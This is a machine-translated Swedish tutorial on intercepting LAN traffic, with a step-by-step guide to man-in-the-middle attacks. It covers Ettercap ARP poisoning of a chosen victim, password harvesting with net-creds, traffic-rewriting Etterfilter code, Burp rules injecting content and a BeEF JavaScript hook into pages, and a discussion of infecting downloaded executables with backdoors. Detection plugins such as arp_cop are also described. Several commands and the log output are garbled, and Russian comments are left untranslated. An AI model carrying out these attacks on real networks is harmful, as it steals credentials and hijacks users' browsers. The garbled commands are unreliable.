Hem › Installation och konfiguration › Hackare använder det för att omdirigera trafik. Metoder för hackerattacker. Dataspoofing med Burp

Hackare använder det för att omdirigera trafik. Metoder för hackerattacker. Dataspoofing med Burp

Metoder för att avlyssna nätverkstrafik

Att lyssna på nätverket med hjälp av nätverksanalysprogram är det första, mesta på ett enkelt sätt dataavlyssning.

För att skydda mot nätverksavlyssning, använd specialprogram, till exempel AntiSniff, som kan identifiera datorer i nätverket som lyssnar på nätverkstrafik.

För att lösa sina problem använder antisnifferprogram ett speciellt tecken på närvaron av lyssningsenheter i nätverket - nätverkskortet på snifferdatorn måste vara i ett speciellt lyssningsläge. I lyssningsläge reagerar nätverksdatorer på ett speciellt sätt på IP-datagram som skickas till värden som testas. Till exempel behandlar lyssnande värdar vanligtvis all inkommande trafik, inte bara datagram som skickas till värdens adress. Det finns andra tecken som tyder på misstänkt värdbeteende som AntiSniff kan känna igen.

Utan tvekan är avlyssning mycket användbart ur en angripares synvinkel, eftersom det gör att man kan få mycket användbar information - lösenord som överförs över nätverket, adresser till nätverksdatorer, konfidentiella data, brev, etc. Enkel avlyssning tillåter dock inte en hackare att störa nätverkskommunikationen mellan två värdar för att modifiera och korrumpera data. För att lösa ett sådant problem krävs mer komplex teknik.

Ris. 1 Falska ARP-förfrågningar

Låt oss se hur en hackare kan använda ARP för att avlyssna nätverkskommunikation mellan värdarna A och B.

För att fånga upp nätverkstrafik mellan värdarna A och B påtvingar hackaren sin IP-adress på dessa värdar, så att A och B använder denna förfalskade IP-adress när de utbyter meddelanden. För att påtvinga sin IP-adress utför hackaren följande operationer.

Angriparen bestämmer MAC-adresserna för värdarna A och B, till exempel med hjälp av kommandot nbtstat från W2RK-paketet.
Angriparen skickar meddelanden till de identifierade MAC-adresserna för värdarna A och B, som är förfalskade ARP-svar på förfrågningar om att lösa värdarnas IP-adresser till datorers MAC-adresser. Värd A informeras om att IP-adressen för värd B motsvarar MAC-adressen för angriparens dator; värd B informeras om att IP-adressen för värd A också motsvarar MAC-adressen för angriparens dator.
Värdarna A och B lagrar de mottagna MAC-adresserna i sina ARP-cacher och använder dem sedan för att skicka meddelanden till varandra. Eftersom IP-adresserna A och B motsvarar MAC-adressen för angriparens dator, kommunicerar värdarna A och B, intet ont anande, genom en mellanhand som kan göra vad som helst med deras meddelanden.

För att skydda mot sådana attacker måste nätverksadministratörer upprätthålla en databas med en överensstämmelsetabell mellan MAC-adresserna och IP-adresserna för deras nätverksdatorer.

På UNIX-nätverk kan den här typen av falska ARP-begäransattacker implementeras med hjälp av systemverktyg för övervakning och hantering av nätverkstrafik, till exempel arpredirect. Tyvärr verkar sådana tillförlitliga verktyg inte vara implementerade på Windows-nätverk. Till exempel, på NTsecurity-webbplatsen kan du ladda ner verktyget GrabitAIl, presenterat som ett verktyg för att omdirigera trafik mellan nätverksvärdar. En grundläggande kontroll av funktionaliteten hos GrabitAII-verktyget visar dock att fullständig framgång med att implementera dess funktioner fortfarande är långt borta.

För att fånga upp nätverkstrafik kan en angripare förfalska den verkliga IP-adressen för en nätverksrouter med sin egen IP-adress, till exempel genom att använda förfalskade ICMP-omdirigeringsmeddelanden. Värd A måste, enligt RFC-1122, uppfatta det mottagna omdirigeringsmeddelandet som ett svar på ett datagram som skickats till en annan värd, till exempel B. Värd A bestämmer sina åtgärder på omdirigeringsmeddelandet baserat på innehållet i det mottagna omdirigeringsmeddelandet, och om omdirigering av datagram specificeras i Omdirigera från A till B längs en ny rutt, är detta exakt vad värd A kommer att göra.

Ris. 2 Falsk routing

För att utföra falsk routing måste angriparen känna till vissa detaljer om organisationen lokalt nätverk, där värd A finns, i synnerhet IP-adressen för routern genom vilken trafik skickas från värd A till B. Med vetskap om detta kommer angriparen att generera ett IP-datagram där avsändarens IP-adress definieras som routerns IP adress, och mottagaren är specificerad värd A. I datagrammet ingår också ett ICMP Redirect-meddelande med den nya routerns adressfält inställt på IP-adressen för angriparens dator. Efter att ha mottagit ett sådant meddelande kommer värd A att skicka alla meddelanden till IP-adressen för angriparens dator.

För att skydda mot en sådan attack bör du inaktivera (till exempel genom att använda en brandvägg) behandlingen av ICMP Redirect-meddelanden på värd A, och tracert-kommandot (i Unix är detta tracerout-kommandot) kan avslöja IP-adressen för angriparens dator . Dessa verktyg kan hitta en ytterligare rutt som har dykt upp på det lokala nätverket som inte tillhandahölls under installationen, såvida inte nätverksadministratören naturligtvis är vaksam.

Ovanstående exempel på avlyssningar (till vilka angriparnas möjligheter är långt ifrån begränsade) övertygar om behovet av att skydda data som överförs över nätverket om data innehåller konfidentiell information. Den enda metoden för skydd mot avlyssning av nätverkstrafik är användningen av program som implementerar kryptografiska algoritmer och krypteringsprotokoll och förhindrar avslöjande och ersättning av hemlig information. För att lösa sådana problem tillhandahåller kryptografi medel för att kryptera, signera och verifiera äktheten av meddelanden som överförs via säkra protokoll.

Praktisk implementering av alla kryptografiska metoder för att skydda informationsutbyte tillhandahålls av VPN-nätverk(Virtual Private Network - Virtuella privata nätverk).

TCP-anslutningsavlyssning

Den mest sofistikerade attacken för avlyssning av nätverkstrafik bör betraktas som TCP-anslutningsfångst (TCP-kapning), när en hackare avbryter den pågående kommunikationssessionen med värden genom att generera och skicka TCP-paket till den attackerade värden. Därefter, med hjälp av TCP-protokollets förmåga att återställa en avbruten TCP-anslutning, avlyssnar hackaren den avbrutna kommunikationssessionen och fortsätter den istället för den frånkopplade klienten.

TCP-protokollet (Transmission Control Protocol) är ett av de grundläggande transportprotokollen. OSI nivå, så att du kan upprätta logiska anslutningar över en virtuell kommunikationskanal. Över denna kanal sänds och tas emot paket med deras sekvens registrerad, flödet av paket kontrolleras, återsändning av förvrängda paket organiseras och i slutet av sessionen bryts kommunikationskanalen. TCP är det enda protokollet grundläggande protokoll från TCP/IP-familjen, som har ett avancerat meddelandeidentifiering och anslutningssystem.

Översikt över mjukvarupaketsniffer

Alla mjukvarusniffare kan delas in i två kategorier: sniffers som stöder lansering från kommandorad, och sniffers med ett grafiskt gränssnitt. Vi noterar dock att det finns sniffers som kombinerar båda dessa funktioner. Dessutom skiljer sig sniffers från varandra i de protokoll de stöder, analysdjupet av uppfångade paket, möjligheten att konfigurera filter och möjligheten till kompatibilitet med andra program.

Vanligtvis fönstret av någon sniffer med grafiskt gränssnitt består av tre områden. Den första av dem visar sammanfattningsdata för avlyssnade paket. Vanligtvis visar detta område ett minimum av fält, nämligen: paketuppfångningstid; IP-adresser för paketsändaren och mottagaren; MAC-adresser för avsändaren och mottagaren av paketet, käll- och destinationsportadresser; protokolltyp (nätverk, transport eller applikationslager); viss sammanfattande information om de avlyssnade uppgifterna. Det andra området visar statistisk information om det individuella valda paketet, och slutligen visar det tredje området paketet i hexadecimal eller ASCII-teckenform.

Nästan alla paketsniffer låter dig analysera avkodade paket (vilket är anledningen till att paketsniffer också kallas paketanalysatorer, eller protokollanalysatorer). Sniffaren distribuerar avlyssnade paket över lager och protokoll. Vissa paketsniffare kan känna igen protokollet och visa den infångade informationen. Denna typ av information visas vanligtvis i det andra området av snifferfönstret. Till exempel kan alla sniffers känna igen TCP-protokollet, och avancerade sniffers kan avgöra vilken applikation som genererade denna trafik. De flesta protokollanalysatorer känner igen över 500 olika protokoll och kan beskriva och avkoda dem med namn. Ju mer information en sniffer kan avkoda och visa på skärmen, desto mindre måste avkodas manuellt.

Ett problem som paketsniffer kan stöta på är oförmågan att korrekt identifiera ett protokoll med en annan port än standardporten. Till exempel, för att förbättra säkerheten, kan vissa välkända applikationer konfigureras för att använda andra portar än standardportarna. Så istället för den traditionella porten 80 reserverad för webbservern, denna server Du kan kraftfullt konfigurera om den till port 8088 eller någon annan. Vissa paketanalysatorer i den här situationen kan inte korrekt bestämma protokollet och visar endast information om protokollet på lägre nivå (TCP eller UDP).

Det finns mjukvarusniffer som kommer med mjukvaruanalytiska moduler som plugins eller inbyggda moduler som låter dig skapa rapporter med användbar analytisk information om avlyssnad trafik.

En annan karakteristisk egenskap hos de flesta mjukvarupaketanalysatorer är möjligheten att konfigurera filter före och efter att trafik fångas. Filter väljer vissa paket från den allmänna trafiken enligt ett givet kriterium, vilket gör att du kan bli av med onödig information när du analyserar trafik.

Alternativ till Ettercap

Ettercap är den mest populära attackmjukvaran för man-i-mitten, men är den den bästa? Genom hela instruktionerna kommer du att se att Ettercap nästan aldrig används ensam, att ett eller annat program alltid byggs med det i en trafikbearbetningskedja. Kanske ger detta flexibilitet, i allmänhet är detta tillvägagångssätt grunden för UNIX - ett program utför en uppgift och slutanvändaren kombinerar olika program för att uppnå önskat resultat. Med detta tillvägagångssätt är programkoden lättare att underhålla; från sådana miniatyr-"tegelstenar" kan du bygga ett system av vilken komplexitet och flexibilitet som helst. Men att ha fem öppna konsoler med olika uppgifter, vars arbete program syftar till att uppnå ett enda resultat, är inte särskilt bekvämt, det är helt enkelt mer komplicerat, det finns en möjlighet att göra ett misstag i något skede, och hela konfigureringen systemet kommer att fungera förgäves.

Net-Creds sniff:

Besökta webbadresser
POST-förfrågningar har skickats
inloggningar/lösenord från HTTP-formulär
inloggningar/lösenord för grundläggande HTTP-autentisering
HTTP-uppslagningar
FTP-inloggningar/lösenord
IRC-inloggningar/lösenord
POP-inloggningar/lösenord
IMAP-inloggningar/lösenord
Telnet-inloggningar/lösenord
SMTP-inloggningar/lösenord
SNMP-gemenskapssträng
alla NTLMv1/v2-protokoll som stöds som HTTP, SMB, LDAP, etc.
Kerberos

Ett bra urval av avlyssnade, och drivnät är enklare i detta avseende - det visar bara avlyssnade bilder.

Växla din maskin till vidarekopplingsläge.

Echo "1"> /proc/sys/net/ipv4/ip_forward

Starta Ettercap med ett grafiskt gränssnitt (-G):

Ettercap-G

Välj nu Värdar, det finns en underpost Sök efter värdar. När skanningen är klar, välj Hosts list:

Som Target1, välj routern (Lägg till i Target 1), som Target2 välj den enhet du ska attackera (Lägg till i Target 2).

Men här kan det första haket uppstå, speciellt om det är många värdar. I olika instruktioner, inklusive i videon som presenteras ovan, klättrar författarna in i målmaskinen (alla har av någon anledning Windows) och med hjälp av kommandot tittar de på denna maskins IP på det lokala nätverket. Håller med, det här alternativet är oacceptabelt för verkliga förhållanden.

Om du skannar med , kan du få några Ytterligare information om värdar, mer exakt, om nätverkskorttillverkaren:

Nmap -sn 192.168.1.0/24

Om data fortfarande inte räcker kan du göra en skanning för att bestämma operativsystemet:

Nmap -O 192.168.1.0/24

Som vi kan se visade sig maskinen med IP 192.168.1.33 vara Windows, om detta inte är ett tecken från ovan, vad är det då? 😉 LOL

Detta är vad vi lägger till som ett andra mål.

Gå nu till menyalternativet Mitm. Där väljer du ARP-förgiftning... Markera rutan för Sniff fjärranslutningar.

Vi börjar skörda, i ett fönster lanserar vi

Net-creds

i en annan (båda programmen kan köras utan alternativ)

Drivnät

Datainsamlingen började omedelbart:

På höger sida har drivnät öppnat ett annat fönster där det visar de avlyssnade bilderna. I net-creds-fönstret ser vi besökta webbplatser och avlyssnade lösenord:

1.2 Ettercap + Burp Suite
3. Visa data (besökta webbplatser och inhämtade lösenord) i Ettercap

I menyn Visa har vi tillgång till flikarna Anslutningar och Profiler. Du kan också markera rutan Lös IP-adresser. Anslutningar är naturligtvis kopplingar. Ettercap samlar in profiler i minnet för varje värd som den upptäcker. Där samlas användare och lösenord. I det här fallet är profiler med registrerade kontodata (lösenord) markerade med ett kryss:

Det finns ingen anledning att förlita sig för mycket på profiler - till exempel är avlyssnade inloggningar och lösenord för FTP och andra tjänster markerade, för vilka programmet tydligt kan tolka informationen som mottas som referenser. Detta inkluderar inte till exempel grundläggande autentiseringsdata, inloggningar och lösenord som anges i webbformulär.

I Connections är de mest lovande uppgifterna markerade med en asterisk:

Du kan dubbelklicka på dessa poster för att se detaljer:

För att inte söka efter dessa stjärnor i listan kan du sortera efter det här fältet och de kommer alla att visas överst eller längst ned:

Fångad grundläggande autentisering:

Inloggningslösenord för Yandex (markerat nedan):

Dessa är de avlyssnade referenserna för VKontakte:

De mest intressanta uppgifterna samlas också in i den nedre konsolen:

Om du vill spara resultaten av programmet, använd sedan dessa alternativ (ange nycklarna när du startar Ettercap:

Loggningsalternativ: -w, --write skriv infångad data till pcapfile -L, --log skriv all trafik till denna -l, --log-info skriv endast passiv information till denna -m, --log-msg skriv alla meddelanden i denna -c, --compress använd gzip-komprimering för loggfiler

4. On-the-fly datasubstitution i Ettercap
4.1 Använda Ettercap anpassade filter

Obs: Trots alla tester fungerade Ettercap-filtren fortfarande inte för mig. Det är svårt att förstå om det är en fråga om händer, hårdvarufunktioner eller ett fel i själva programmet... Men för version 0.8.2 (senast för tillfället) finns det en felrapport om problem med filter. I allmänhet, att döma av felrapporter och forum, faller filter antingen av ofta eller har inte fungerat alls på länge. Det finns en gren där ändringar gjordes för 5 månader sedan https://github.com/Ettercap/ettercap/tree/filter-improvements, d.v.s. filterförbättringar (med filterförbättringar). Både för denna gren och för versionen från förvaret gjordes en mängd olika tester, olika filter testades under olika förhållanden, mycket tid gick åt, men det blev inget resultat. Förresten, för att installera filterförbättringsversionen i Kali Linux måste du göra detta:

Sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libncurses5-dev libncurses5-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkPDadir_DOCS build_cd =På ../ gör sudo make installera

I allmänhet, om dina filter inte fungerar, då är du inte ensam. I instruktionerna om Ettercap kan jag inte hoppa över ämnet filter, så de kommer att diskuteras i alla fall.

Hittills har vi använt Ettercap för ARP-spoofing. Detta är en mycket ytlig applikation. Tack vare anpassade filter kan vi ingripa och ändra trafik i farten. Filter måste finnas i separata filer och måste kompileras med programmet Etterfilter före användning. Även om dokumentationen som länken ges till verkar knapphändig, men tillsammans med exemplen nedan, låter den dig skriva ganska intressanta filter.

Låt oss skapa vårt första filter, det kommer att ersätta alla bilder med detta:

I en fil med namnet img_replacer.filter copy:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Acceptera-Kodning")) ( replace("Acceptera-Kodning", "Acceptera-Skräp!"); # notera: ersättningssträngen är lika lång som den ursprungliga msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter körde.\n"); )

Kompilera filen:

Efterfilter img_replacer.filter -o img_replacer.ef

Sammanställningsresultat:

Etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 14 protokolltabeller laddade: DEKODAD DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 konstanter laddade: VRRP OSPF GRE UDP TCP ESP ICMP6 APP IP källa PPP källa "img_replacer.filter" klar. Vikning av meta-trädet klart. Konvertering av etiketter till riktiga förskjutningar gjort. Skriver utdata till "img_replacer.ef" klar. -> Skript kodat till 18 instruktioner.

Omkopplaren -F säger åt programmet att ladda filtret från filen som följer efter omkopplaren. Efter kompileringen är namnet på vår nya fil med filtret img_replacer.ef, så kommandot har följande form:

Ettercap -G -F img_replacer.ef

Obs! När du övervakar webbtrafik kan paketen du ser vara i krypterad form. För effektivt arbete filter behöver Ettercap trafik i formuläret oformatterad text. Enligt vissa observationer är kodningstypen som webbsidor använder "Accept-Encoding: gzip, deflate"

Nedan finns ett filter som skriver över kodningen, vilket tvingar fram kommunikation i form av vanlig text:

If (ip.proto == TCP && tcp.dst == 80) (if (search(DATA.data, "gzip")) ( replace("gzip", " "); # notera: fyra blanksteg i den ersatta strängen msg ("vitade gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # notera: sju mellanslag i den ersatta raden msg("whiteed out deflate\n"); ) )

Syntaxen för att skriva filter beskrivs i detalj, och sedan finns det några fler exempel:

# ersätter text i ett paket: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter körde"); ) # show meddelande , om tcp-porten är 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH-paket\n"); ) ) # skriv ner hela telnet-trafiken, kör också ./program för varje paket if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); ) ) # logga all trafik utom http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( logga (DATA.data , "./logfile.log"); ) # vissa operationer på paketets nyttolast om (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = " modified"; DATA .data + 20 = 0x4445; ) # släpp alla paket som innehåller "ettercap" if (search(DECODED.data, "ettercap")) ( msg("någon pratar om oss...\n") ; drop( ); kill(); ) # registrera dekrypterade ssh-paket som matchar det reguljära uttrycket if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # dödande paket if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Datasubstitution med Burp

Vi lanserar Ettercap och Burp som beskrivs i avsnitt 1.2 eller i avsnitt 2.2.

I Burp, gå till Proxy -> Alternativ. Vi hittar Match and Replace där. Klicka på Lägg till för att lägga till en ny regel.

Request header är begäran header
Request body - request body
Svarshuvud - svarshuvud
Responskropp - svarskropp
Begär parameternamn - Begär parameternamn
Begär parametervärde - Begär parametervärde
Begär första raden - Första raden i begäran

Om du behöver ändra data som överförs med GET-metoden, så gäller detta rubriker.

I HTML-uppmärkning finns det också något som heter head (head-tagg). De som nämns ovan har ingenting med den här titeln att göra. Lite högre talar vi om pakethuvuden. Om du vill ändra innehållet HTML-sidor, då ska du alltid välja Response body istället för Request header, även om du ska ändra innehållet i head-taggen (till exempel titeln).

Om du inte är bekant med vanliga uttryck, då finns det i princip inget att oroa sig för: HTML förlåter mycket, och vad den inte förstår ignorerar den helt enkelt - du kan använda den. Om du vet hur man använder reguljära uttryck, då respekterar jag dig.)))

Låt oss till exempel skapa en ny regel genom att ändra Request header till Response body. I själva regeln kommer vi att ändra

Ingen titel

Markera rutan Regex-matchning.

Nu på alla webbplatser (utan HTTPS) kommer titeln att vara Ingen titel:

Infoga en godtycklig rad efter body-taggen (det kommer att vara den första raden i texten). Request header ändras till Response body. Vi förändras

Markera rutan Regex-matchning.

I det övre högra hörnet (beroende på layout) visas inskriptionen "Jag är cool!". Du kan infoga CSS, JavaScript-kod, vilken text som helst - vad som helst. Du kan i allmänhet ta bort allt från sidan och sedan fylla den med ditt eget innehåll - allt beror på din fantasi.

Tanken var att ändra varje formulär något så att data skulle skickas till den ursprungliga servern och till angriparens server (implementera multi-submit för varje formulär). Men efter att ha resonerat att om den överförda informationen inte är krypterad och vi har tillgång till den, då vi redan ser den, finns det ingen anledning att skicka den till någon server. Men om någon behöver ett riktigt fungerande exempel på att skicka data från ett formulär till flera servrar samtidigt.

5. Anslutning till BeEF

För att börja använda funktionerna i BeEF måste vi bädda in en JavaScript-fil i HTML-koden, vanligtvis en rad som:

De följande två metoderna skiljer sig endast i metoden för att bädda in denna sträng.

5.1 Anslutning av BeEF med Ettercap-filter

[avsnitt kommer att förberedas senare]

5.2 Ansluta BeEF med Burp

Du måste börja exakt som skrivet i punkt 4.2. Endast istället för att ersätta rubriker och lägga till text på webbplatsen kommer vi att implementera JavaScript-kod i form av en rad:

I mitt fall finns den här filen på IP 192.168.1.36 på port 3000. Filen heter hook.js (kan ändras i inställningarna). De där. i mitt fall måste jag injicera linjen:

Detta kan till exempel göras genom att skapa en ny regel, ändra Request header till Response body. Ersättning måste ske i själva HTML-koden

Bra, när du öppnar en webbplats som inte har HTTPS, infogas JavaScript-kod i HTML-koden, vilket gör att du kan samla in information genom en ansluten webbläsare och utföra olika attacker:

6. Smitta med bakdörrar

Du kan ersätta och infektera körbara filer med både Ettercap-filter [som av någon anledning inte längre fungerar] och med tredje parts applikationer. Till exempel kan BDFProxy göra detta i farten. Tyvärr är BDFProxy fortfarande på väg efter uppdateringen av Backdoor Factory från april 2016: libmproxy-paketet döptes om till mitmproxy i Python. För BDFProxy är libmproxy-paketet ett nödvändigt beroende; utan detta paket kommer programmet inte att starta. Därför, nu, innan "reparationen" av BDFProxy, är det omöjligt att använda det, för även med Backdoor Factory installerat, klagar BDFProxy-programmet över frånvaron av libmproxy-biblioteket ...

En liknande operation kan göras med Burp Suite. Steg-för-steg-algoritmen presenteras; det är ingen mening att skriva om den igen i det här avsnittet.

7. Använda Ettercap plugins

Information om Ettercap-plugins kan hittas. Det finns en hel del plugins, de som beskrivs nedan verkar vara de mest intressanta.

Plugins kan anslutas när Ettercap startas, det finns ett alternativ för detta:

P, --plugin kör detta

Plugins kan också laddas från GUI:

[MATERIAL UNDER FÖRBEREDELSE]

7.1 arp_cop

Den rapporterar misstänkt ARP-aktivitet genom att passivt övervaka ARP-förfrågningar/svar. Den kan rapportera ARP-förgiftningsförsök eller enkla IP-konflikter eller IP-ändringar. Om du bygger en första lista med värdar kommer plugin-programmet att fungera mer exakt.

Ettercap -TQP arp_cop //

Ett exempel på verklig upptäckt av ARP-spoofing:

Bygga ut

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // lösenord för mial: ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Lyssnar på: eth0 -> 08:00:27:A3:08:4A 192.168.1.3 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL-dissektion behöver ett giltigt "redir_command_on"-skript i etter.conf-filen. Behörigheter släpptes till EUID 65534 EGID 65534... 33 portar protokoll övervaka 33 portar protokoll 425 mac leverantörsfingeravtryck 1766 tcp OS fingeravtryck 2182 kända tjänster Randomisering av 255 värdar för skanning... Skannar hela nätmasken efter 255 värdar... * |====================== ==============================>| 100,00 % 3 värdar har lagts till i värdlistan... Startar Unified sniffing... Endast text Gränssnitt aktiverat... Tryck på "h" för inline hjälp Aktiverar arp_cop plugin... arp_cop: plugin kör... arp_cop: (ny värd ) 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1.1.168.1c.1c. 5 låtsas vara 192.168.1.1 arp_cop: ( VARNING ) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.318. _cop: (VARNING) 192.168.1.35 låtsas vara 192.168 .1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1c.192.168.1c.1c. 5 låtsas vara 192.1 68.1.1 arp_cop: ( VARNING) 192.168 .1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.318. _cop: (VARNING) 192.1 68.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1.8.192.168.1cop: 9.168.1cop.11cop. låtsas vara 192.168.1. 1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.318. _cop: (VARNING) 192.168.1.3 5 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1c.192.168.1c.1c. 5 låtsas vara 192.168.1.1 arp_cop : ( VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.312s. 192.168.1.168. polis: (VARNING) 192.168.1.35 låtsas vara 192. 168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_1.6 låtsas vara 192.168.1.1 arp31c be. 19 2.168.1.1 arp_cop: (VARNING ) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.c 192.168.21 till 9168.21. : (VARNING) 192.168.1.35 låtsas vara 192.168 1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: 5.1 s. 9W2_cop: 51. 92.16 8.1.1 arp_cop: (VARNING) 192.168. 1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.1.35 låtsas vara 192.168.1.1 arp_cop: (VARNING) 192.168.135 till 192.168.13.13 till 192.168.13. (VARNING) 192.16 8.1.35 låtsas vara 192.168 .1.1. ...........................

7.2 autoadd

Det kommer automatiskt att lägga till nya offer när de ansluter till ARP-förgiftningen mitm-attacken. Den letar efter ARP-förfrågningar på det lokala nätverket, och om det upptäcks kommer plugin-programmet att lägga till värden till listan över offer om listan angavs som ett MÅL. En värd läggs till när en arp-begäran är synlig från den.

7,3 chk_gift

Den kontrollerar om arp etch-moduler i ettercap är framgångsrika. Den skickar falska ICMP-ekopaket till alla offer för lockbete samtidigt som de låtsas vara varje offer. Den kan fånga ett ICMP-svar med vår MAC-adress som destination, vilket betyder att betet mellan de två målen lyckas. Den kontrollerar båda vägarna för varje anslutning.

7.4 dns_spoof

Denna plugin avbryter DNS-förfrågningar och svarar med ett falskt (falskt) svar. Du kan välja vilken adress plugin-programmet ska svara på genom att redigera filen etter.dns. Insticksprogrammet fångar upp A-, AAAA-, PTR-, MX-, WINS-, SRV- och TXT-förfrågningar. Om det var en A-förfrågan, så slås namnet upp i filen och IP-adressen returneras (du kan använda jokertecken i namnet).

Detsamma gäller för AAAA-förfrågningar.

7.5 find_conn

En mycket enkel plugin som lyssnar efter ARP-förfrågningar för att visa dig alla mål som värden vill kommunicera med. Det kan också hjälpa dig att hitta adresser på okända LAN.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Försöker identifiera ettercap-paket som skickas till LAN. Det kan vara användbart för att identifiera någon som försöker använda ettercap. Lita inte på det till 100 % eftersom testerna bara fungerar på specifika sekvenser/ID-nummer.

7.7 scan_poisoner

Ska kolla om det är någon som äter mellan någon av värdarna på listan och oss. Först kontrollerar den om två värdar i listan har samma MAC-adress. Det kan betyda att en av dem förgiftar oss genom att låtsas vara den andra. Det kan generera många falska positiva resultat i en proxy-arp-miljö. Du måste skapa en lista med värdar för att utföra denna kontroll. Efter det skickar den icmp-ekopaket till varje värd i listan och kontrollerar om mac-adressen för svarskällan skiljer sig från adressen vi lagrade i listan med den IP-adressen. Detta kan betyda att någon lockar denna värd genom att låtsas ha vår IP-adress och vidarebefordra de avlyssnade paketen till oss. Du kan inte köra detta aktiva test i oförstörande läge.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Den försöker hitta om någon nosar (lyssnar) i promiskuöst läge. Den skickar två olika dåligt utformade arp-förfrågningar till varje mål i värdlistan och väntar på svar. Om svaret kom från målvärden är det mer eller mindre troligt att målet har nätverkskortet i promiskuöst läge. Det kan generera falska larm. Du kan köra det antingen från kommandoraden eller från pluginsmenyn. Eftersom den lyssnar efter arp-svar blir det bättre om du inte använder dem när du skickar arp-förfrågningar.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Ett exempel på att lyckas gissa två nätverkskort i promiskuöst läge:

Bygga ut

